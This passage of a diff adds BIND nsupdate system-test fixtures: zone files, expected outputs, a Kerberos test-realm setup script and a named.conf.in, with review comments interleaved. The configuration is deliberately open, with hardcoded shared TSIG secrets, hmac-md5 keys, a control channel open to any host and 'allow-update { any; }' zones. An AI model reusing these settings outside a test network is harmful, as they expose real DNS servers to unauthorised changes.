"PC" "NetBSD" +isdn01.example.nil. 3600 IN ISDN "isdn-address" +isdn02.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example.nil. 3600 IN ISDN "isdn-address" +isdn04.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +key01.example.nil. 
3600 IN KEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +kx01.example.nil. 3600 IN KX 10 kdc.example.nil. +kx02.example.nil. 3600 IN KX 10 . +loc01.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01.example.nil. 3600 IN MG madname.example.nil. +mb02.example.nil. 3600 IN MG . +mg01.example.nil. 3600 IN MG mgmname.example.nil. +mg02.example.nil. 3600 IN MG . +minfo01.example.nil. 3600 IN MINFO rmailbx.example.nil. emailbx.example.nil. +minfo02.example.nil. 3600 IN MINFO . . +mr01.example.nil. 3600 IN MR mrname.example.nil. +mr02.example.nil. 3600 IN MR . +mx01.example.nil. 3600 IN MX 10 mail.example.nil. +mx02.example.nil. 3600 IN MX 10 . +naptr01.example.nil. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example.nil. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +ns1.example.nil. 300 IN A 10.53.0.1 +ns2.example.nil. 300 IN A 10.53.0.2 +nsap-ptr01.example.nil. 3600 IN NSAP-PTR . +nsap-ptr01.example.nil. 3600 IN NSAP-PTR foo. +nsap01.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01.example.nil. 3600 IN NXT a.secure.example.nil. NS SOA MX SIG KEY LOC NXT +nxt02.example.nil. 3600 IN NXT . NSAP-PTR NXT +nxt03.example.nil. 3600 IN NXT . A +nxt04.example.nil. 3600 IN NXT . 127 +ptr01.example.nil. 3600 IN PTR example.nil. +px01.example.nil. 3600 IN PX 65535 foo. bar. +px02.example.nil. 3600 IN PX 65535 . . +rp01.example.nil. 3600 IN RP mbox-dname.example.nil. txt-dname.example.nil. +rp02.example.nil. 3600 IN RP . . +rt01.example.nil. 3600 IN RT 0 intermediate-host.example.nil. +rt02.example.nil. 3600 IN RT 65535 . +s.example.nil. 300 IN NS ns.s.example.nil. +ns.s.example.nil. 300 IN A 73.80.65.49 +sig01.example.nil. 
3600 IN SIG NXT 1 3 3600 20000102030405 19961211100908 2143 foo.example.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +srv01.example.nil. 3600 IN SRV 0 0 0 . +srv02.example.nil. 3600 IN SRV 65535 65535 65535 old-slow-box.example.com. +txt01.example.nil. 3600 IN TXT "foo" +txt02.example.nil. 3600 IN TXT "foo" "bar" +txt03.example.nil. 3600 IN TXT "foo" +txt04.example.nil. 3600 IN TXT "foo" "bar" +txt05.example.nil. 3600 IN TXT "foo bar" +txt06.example.nil. 3600 IN TXT "foo bar" +txt07.example.nil. 3600 IN TXT "foo bar" +txt08.example.nil. 3600 IN TXT "foo\010bar" +txt09.example.nil. 3600 IN TXT "foo\010bar" +txt10.example.nil. 3600 IN TXT "foo bar" +txt11.example.nil. 3600 IN TXT "\"foo\"" +txt12.example.nil. 3600 IN TXT "\"foo\"" +u.example.nil. 300 IN TXT "txt-not-in-nxt" +a.u.example.nil. 300 IN A 73.80.65.49 +b.u.example.nil. 300 IN A 73.80.65.49 +updated.example.nil. 600 IN TXT "Foo" +updated.example.nil. 600 IN A 10.10.10.1 +wks01.example.nil. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example.nil. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example.nil. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example.nil. 3600 IN X25 "123456789" +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 2 2000 2000 1814400 3600 diff --git a/bin/tests/system/nsupdate/knowngood.ns1.afterstop b/bin/tests/system/nsupdate/knowngood.ns1.afterstop new file mode 100644 index 0000000..e871d4c --- /dev/null +++ b/bin/tests/system/nsupdate/knowngood.ns1.afterstop @@ -0,0 +1,3 @@ +updated4.example.nil. 600 IN A 10.10.10.3 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. diff --git a/bin/tests/system/nsupdate/knowngood.ns1.before b/bin/tests/system/nsupdate/knowngood.ns1.before new file mode 100644 index 0000000..4a5e630 --- /dev/null +++ b/bin/tests/system/nsupdate/knowngood.ns1.before 
@@ -0,0 +1,98 @@ +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 1 2000 2000 1814400 3600 +example.nil. 300 IN NS ns1.example.nil. +example.nil. 300 IN NS ns2.example.nil. +*.example.nil. 300 IN MX 10 mail.example.nil. +a.example.nil. 300 IN TXT "foo foo foo" +a.example.nil. 300 IN PTR foo.net. +a01.example.nil. 3600 IN A 0.0.0.0 +a02.example.nil. 3600 IN A 255.255.255.255 +a601.example.nil. 3600 IN AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01.example.nil. 3600 IN AFSDB 0 hostname.example.nil. +afsdb02.example.nil. 3600 IN AFSDB 65535 . +b.example.nil. 300 IN CNAME foo.net. +c.example.nil. 300 IN A 73.80.65.49 +cert01.example.nil. 3600 IN CERT 65534 65535 PRIVATEOID MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +cname01.example.nil. 3600 IN CNAME cname-target. +cname02.example.nil. 3600 IN CNAME cname-target.example.nil. +cname03.example.nil. 3600 IN CNAME . +d.example.nil. 300 IN A 73.80.65.49 +dname01.example.nil. 3600 IN DNAME dname-target. +dname02.example.nil. 3600 IN DNAME dname-target.example.nil. +dname03.example.nil. 3600 IN DNAME . +e.example.nil. 300 IN MX 10 mail.example.nil. +e.example.nil. 300 IN TXT "one" +e.example.nil. 300 IN TXT "two" +e.example.nil. 300 IN TXT "three" +e.example.nil. 300 IN A 73.80.65.49 +e.example.nil. 300 IN A 73.80.65.50 +e.example.nil. 300 IN A 73.80.65.51 +e.example.nil. 300 IN A 73.80.65.52 +f.example.nil. 300 IN A 73.80.65.52 +gpos01.example.nil. 3600 IN GPOS "-22.6882" "116.8652" "250.0" +gpos02.example.nil. 3600 IN GPOS "" "" "" +hinfo01.example.nil. 3600 IN HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02.example.nil. 3600 IN HINFO "PC" "NetBSD" +isdn01.example.nil. 3600 IN ISDN "isdn-address" +isdn02.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +isdn03.example.nil. 3600 IN ISDN "isdn-address" +isdn04.example.nil. 3600 IN ISDN "isdn-address" "subaddress" +key01.example.nil. 
3600 IN KEY 512 255 1 AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aRyzWZriO6i2od GWWQVucZqKVsENW91IOW4vqudngPZsY3GvQ/xVA8/7pyFj6b7Esga60z yGW6LFe9r8n6paHrlG5ojqf0BaqHT+8= +kx01.example.nil. 3600 IN KX 10 kdc.example.nil. +kx02.example.nil. 3600 IN KX 10 . +loc01.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02.example.nil. 3600 IN LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01.example.nil. 3600 IN MG madname.example.nil. +mb02.example.nil. 3600 IN MG . +mg01.example.nil. 3600 IN MG mgmname.example.nil. +mg02.example.nil. 3600 IN MG . +minfo01.example.nil. 3600 IN MINFO rmailbx.example.nil. emailbx.example.nil. +minfo02.example.nil. 3600 IN MINFO . . +mr01.example.nil. 3600 IN MR mrname.example.nil. +mr02.example.nil. 3600 IN MR . +mx01.example.nil. 3600 IN MX 10 mail.example.nil. +mx02.example.nil. 3600 IN MX 10 . +naptr01.example.nil. 3600 IN NAPTR 0 0 "" "" "" . +naptr02.example.nil. 3600 IN NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +ns1.example.nil. 300 IN A 10.53.0.1 +ns2.example.nil. 300 IN A 10.53.0.2 +nsap-ptr01.example.nil. 3600 IN NSAP-PTR . +nsap-ptr01.example.nil. 3600 IN NSAP-PTR foo. +nsap01.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02.example.nil. 3600 IN NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01.example.nil. 3600 IN NXT a.secure.example.nil. NS SOA MX SIG KEY LOC NXT +nxt02.example.nil. 3600 IN NXT . NSAP-PTR NXT +nxt03.example.nil. 3600 IN NXT . A +nxt04.example.nil. 3600 IN NXT . 127 +ptr01.example.nil. 3600 IN PTR example.nil. +px01.example.nil. 3600 IN PX 65535 foo. bar. +px02.example.nil. 3600 IN PX 65535 . . +rp01.example.nil. 3600 IN RP mbox-dname.example.nil. txt-dname.example.nil. +rp02.example.nil. 3600 IN RP . . +rt01.example.nil. 3600 IN RT 0 intermediate-host.example.nil. +rt02.example.nil. 3600 IN RT 65535 . +s.example.nil. 300 IN NS ns.s.example.nil. +ns.s.example.nil. 300 IN A 73.80.65.49 +sig01.example.nil. 
3600 IN SIG NXT 1 3 3600 20000102030405 19961211100908 2143 foo.example.nil. MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +srv01.example.nil. 3600 IN SRV 0 0 0 . +srv02.example.nil. 3600 IN SRV 65535 65535 65535 old-slow-box.example.com. +t.example.nil. 301 IN A 73.80.65.49 +txt01.example.nil. 3600 IN TXT "foo" +txt02.example.nil. 3600 IN TXT "foo" "bar" +txt03.example.nil. 3600 IN TXT "foo" +txt04.example.nil. 3600 IN TXT "foo" "bar" +txt05.example.nil. 3600 IN TXT "foo bar" +txt06.example.nil. 3600 IN TXT "foo bar" +txt07.example.nil. 3600 IN TXT "foo bar" +txt08.example.nil. 3600 IN TXT "foo\010bar" +txt09.example.nil. 3600 IN TXT "foo\010bar" +txt10.example.nil. 3600 IN TXT "foo bar" +txt11.example.nil. 3600 IN TXT "\"foo\"" +txt12.example.nil. 3600 IN TXT "\"foo\"" +u.example.nil. 300 IN TXT "txt-not-in-nxt" +a.u.example.nil. 300 IN A 73.80.65.49 +b.u.example.nil. 300 IN A 73.80.65.49 +wks01.example.nil. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example.nil. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example.nil. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example.nil. 3600 IN X25 "123456789" +example.nil. 300 IN SOA ns1.example.nil. hostmaster.example.nil. 1 2000 2000 1814400 3600 diff --git a/bin/tests/system/nsupdate/krb/setup.sh b/bin/tests/system/nsupdate/krb/setup.sh new file mode 100644 index 0000000..5ac116c --- /dev/null +++ b/bin/tests/system/nsupdate/krb/setup.sh 
@@ -0,0 +1,117 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -x
+
+PWD=`pwd`
+
+KRB5_CONFIG="${PWD}/krb5.conf"
+export KRB5_CONFIG
+
+KRB5_KDC_PROFILE=${PWD}/krb5kdc
+export KRB5_KDC_PROFILE
+
+now=`date +%s`
+lifetime=`expr 2147483647 - $now`
+lifetime=`expr $lifetime / 3600 / 24 - 30`
+
+cat << EOF > "${KRB5_CONFIG}"
+[libdefaults]
+ default_realm = EXAMPLE.COM
+ dns_lookup_kdc = false
+ # Depending on what you are testing, you may want something like:
+ # default_keytab_name = FILE:/usr/local/var/keytab
+[realms]
+ EXAMPLE.COM = {
+ admin_server = 127.0.0.1:50001
+ kdc = 127.0.0.1:50000
+ database_module = DB2
+ kdc_ports = 50000
+ kadmind_port = 50001
+ }
+[dbmodules]
+ DB2 = {
+ db_library = db2
+ }
+[logging]
+ # Use any pathnames you want here.
+ kdc = FILE:${PWD}/kdc.log
+ admin_server = FILE:${PWD}/kadmin.log
+# Depending on what you are testing, you may want:
+# [domain_realm]
+# your.domain = EXAMPLE.COM
+EOF
+
+rm -rf ${KRB5_KDC_PROFILE}
+mkdir -p ${KRB5_KDC_PROFILE}
+chmod 700 ${KRB5_KDC_PROFILE}
+
+cat << EOF > "${KRB5_KDC_PROFILE}"/kdc.conf
+[kdcdefaults]
+ kdc_ports = 50000
+ kdc_tcp_ports = 50000
+
+[realms]
+ EXAMPLE.COM = {
+ key_stash_file = ${KRB5_KDC_PROFILE}/.k5.EXAMPLE.COM
+ database_module = EXAMPLE.COM
+ max_life = ${lifetime}d
+}
+
+[dbmodules]
+ EXAMPLE.COM = {
+ db_library = db2
+ database_name = ${KRB5_KDC_PROFILE}/principal
+ }
+EOF
+
+kdb5_util create -s <<EOF
+master
+master
+EOF
+
+krb5kdc -n &
+krb5kdcpid=$!
+#trap "kill $krb5kdcpid; wait; trap 0; exit" 0 15
+
+
+kadmin.local addprinc -maxlife ${lifetime}d -randkey DNS/ns7.example.com@EXAMPLE.COM
+kadmin.local addprinc -maxlife ${lifetime}d -randkey DNS/ns8.example.com@EXAMPLE.COM
+kadmin.local addprinc -maxlife ${lifetime}d -randkey host/machine.example.com@EXAMPLE.COM
+
+kadmin.local ktadd -k ns7-server.keytab DNS/ns7.example.com@EXAMPLE.COM
+kadmin.local ktadd -k ns8-server.keytab DNS/ns8.example.com@EXAMPLE.COM
+kadmin.local ktadd -k krb5-machine.keytab host/machine.example.com@EXAMPLE.COM
+
+kadmin.local addprinc -maxlife ${lifetime}d -randkey 'DNS/ns9.example.com@EXAMPLE.COM'
+kadmin.local addprinc -maxlife ${lifetime}d -randkey 'DNS/ns10.example.com@EXAMPLE.COM'
+kadmin.local addprinc -maxlife ${lifetime}d -randkey 'machine$@EXAMPLE.COM'
+
+kadmin.local ktadd -k ns9-server.keytab 'DNS/ns9.example.com@EXAMPLE.COM'
+kadmin.local ktadd -k ns10-server.keytab 'DNS/ns10.example.com@EXAMPLE.COM'
+kadmin.local ktadd -k ms-machine.keytab 'machine$@EXAMPLE.COM'
+
+kinit -V -k -t krb5-machine.keytab -l ${lifetime}d -c krb5-machine.ccache host/machine.example.com@EXAMPLE.COM
+kinit -V -k -t ms-machine.keytab -l ${lifetime}d -c ms-machine.ccache 'machine$@EXAMPLE.COM'
+
+cp ns7-server.keytab ../ns7/dns.keytab
+cp ns8-server.keytab ../ns8/dns-other-than-KRB5_KTNAME.keytab
+cp ns9-server.keytab ../ns9/dns.keytab
+cp ns10-server.keytab ../ns10/dns.keytab
+
+cp krb5-machine.ccache ../ns7/machine.ccache
+cp krb5-machine.ccache ../ns8/machine.ccache
+cp ms-machine.ccache ../ns9/machine.ccache
+cp ms-machine.ccache ../ns10/machine.ccache
+
+echo krb5kdc pid:$krb5kdcpid
diff --git a/bin/tests/system/nsupdate/ns1/example1.db b/bin/tests/system/nsupdate/ns1/example1.db
new file mode 100644
index 0000000..566b0a0
--- /dev/null
+++ b/bin/tests/system/nsupdate/ns1/example1.db
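Review bot: In krb/setup.sh the three directory commands `rm -rf ${KRB5_KDC_PROFILE}`, `mkdir -p ${KRB5_KDC_PROFILE}` and `chmod 700 ${KRB5_KDC_PROFILE}` expand a path derived from `pwd` without quotes, although the heredoc redirections beside them quote the same variables; in a checkout path that contains whitespace the `rm -rf` would act on the split words. Quote all three, e.g. `rm -rf "${KRB5_KDC_PROFILE}"`. The script also runs with `set -x` but no `set -e`, so a failed `kdb5_util create` or `kadmin.local` call still ends with keytabs and credential caches being copied into `../ns7` to `../ns10`. With the `trap` line commented out, the `krb5kdc -n &` process, whose database is created with the fixed master password `master`, keeps running after the script exits. A header comment saying that the keytabs and ccaches are throwaway fixtures for the EXAMPLE.COM test realm, and that the KDC has to be stopped by hand using the printed pid, would make both facts explicit.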
@@ -0,0 +1,146 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example.nil. NS ns1.example.nil. +ns1.example.nil. A 10.53.0.1 +example.nil. NS ns2.example.nil. +ns2.example.nil. A 10.53.0.2 + +$ORIGIN example.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example.nil. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example.nil. +ns A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example.nil. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example.nil. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/nsupdate/ns1/many.test.db.in b/bin/tests/system/nsupdate/ns1/many.test.db.in new file mode 100644 index 0000000..824971b --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/many.test.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns1.example.nil. + NS ns2.example.nil. diff --git a/bin/tests/system/nsupdate/ns1/max-ttl.db b/bin/tests/system/nsupdate/ns1/max-ttl.db new file mode 100644 index 0000000..fea00b9 --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/max-ttl.db 
@@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +max-ttl.nil IN SOA ns1.max-ttl.nil. hostmaster.max-ttl.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +max-ttl.nil. NS ns1.max-ttl.nil. +ns1.max-ttl.nil. A 10.53.0.1 +max-ttl.nil. NS ns2.max-ttl.nil. +ns2.max-ttl.nil. A 10.53.0.2 + +$ORIGIN max-ttl.nil. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. diff --git a/bin/tests/system/nsupdate/ns1/maxjournal.db.in b/bin/tests/system/nsupdate/ns1/maxjournal.db.in new file mode 100644 index 0000000..d64842b --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/maxjournal.db.in @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns1.example.nil. diff --git a/bin/tests/system/nsupdate/ns1/named.conf.in b/bin/tests/system/nsupdate/ns1/named.conf.in new file mode 100644 index 0000000..a5cc36d --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/named.conf.in 
@@ -0,0 +1,162 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 22; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + minimal-responses no; + update-quota 1; +}; + +acl named-acl { + any; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key altkey { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key restricted.example.nil { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key zonesub-key.example.nil { + algorithm hmac-md5; + secret "1234subk8765"; +}; + +include "ddns.key"; + +zone "example.nil" { + type primary; + file "example.db"; + check-integrity no; + check-mx ignore; + update-policy { + grant zonesub-key.example.nil zonesub TXT; + grant ddns-key.example.nil subdomain example.nil ANY; + grant restricted.example.nil subdomain restricted.example.nil ANY; + }; + allow-transfer { any; }; +}; + +zone "max-ttl.nil" { + type primary; + file "max-ttl.db"; + max-zone-ttl 300; + check-integrity no; + allow-update { named-acl; }; + allow-transfer { any; }; +}; + +zone "other.nil" { + type primary; + file "other.db"; + check-integrity no; + check-mx warn; + update-policy local; + allow-query { !10.53.0.2; any; }; + allow-query-on { 10.53.0.1; 127.0.0.1; }; + allow-transfer { any; }; +}; + +primaries others { + 10.53.0.2 
port @PORT@; + 10.53.0.2 port @PORT@ key altkey; +}; + +zone "update.nil" { + type primary; + file "update.db"; + check-integrity no; + check-mx fail; + allow-update { any; }; + allow-transfer { any; }; + also-notify { others; }; +}; + +zone "unixtime.nil" { + type primary; + file "unixtime.db"; + check-integrity no; + allow-update { any; }; + allow-transfer { any; }; + serial-update-method unixtime; +}; + +zone "yyyymmddvv.nil" { + type primary; + file "yyyymmddvv.db"; + check-integrity no; + allow-update { any; }; + allow-transfer { any; }; + serial-update-method date; +}; + +include "md5.key"; +include "sha1.key"; +include "sha224.key"; +include "sha256.key"; +include "sha384.key"; +include "sha512.key"; + +zone "keytests.nil" { + type primary; + file "keytests.db"; + update-policy { + grant md5-key name md5.keytests.nil. ANY; + grant sha1-key name sha1.keytests.nil. ANY; + grant sha224-key name sha224.keytests.nil. ANY; + grant sha256-key name sha256.keytests.nil. ANY; + grant sha384-key name sha384.keytests.nil. ANY; + grant sha512-key name sha512.keytests.nil. ANY; + }; +}; + +zone "many.test" { + type primary; + allow-update { any; }; + file "many.test.db"; +}; + +zone "sample" { + type primary; + allow-update { any; }; + file "sample.db"; +}; + +zone "maxjournal.test" { + type primary; + allow-update { any; }; + file "maxjournal.db"; + max-journal-size default; +}; diff --git a/bin/tests/system/nsupdate/ns1/sample.db.in b/bin/tests/system/nsupdate/ns1/sample.db.in new file mode 100644 index 0000000..9118bef --- /dev/null +++ b/bin/tests/system/nsupdate/ns1/sample.db.in 
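Review bot: Nothing in ns1/named.conf.in says that its wide-open access controls are deliberate: the control channel is `allow { any; }`, the keys `rndc_key`, `altkey` and `restricted.example.nil` all carry the same literal secret `1234abcd8765` (two of them with `hmac-md5`), and `update.nil`, `unixtime.nil`, `yyyymmddvv.nil`, `many.test`, `sample` and `maxjournal.test` accept `allow-update { any; }`. The same pattern recurs in the ns10, ns2 and ns3 `named.conf.in` hunks of this commit (the same `rndc_key` secret in ns10 and ns2, `allow-update { any; }` on every primary zone in ns3). That is reasonable for servers bound to the 10.53.0.x test addresses, but config fragments like these tend to be copied, so I would add a header comment to each file such as `/* System-test fixture: keys are fixed public values and updates/transfers are intentionally unrestricted. Do not reuse outside the test network. */`.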
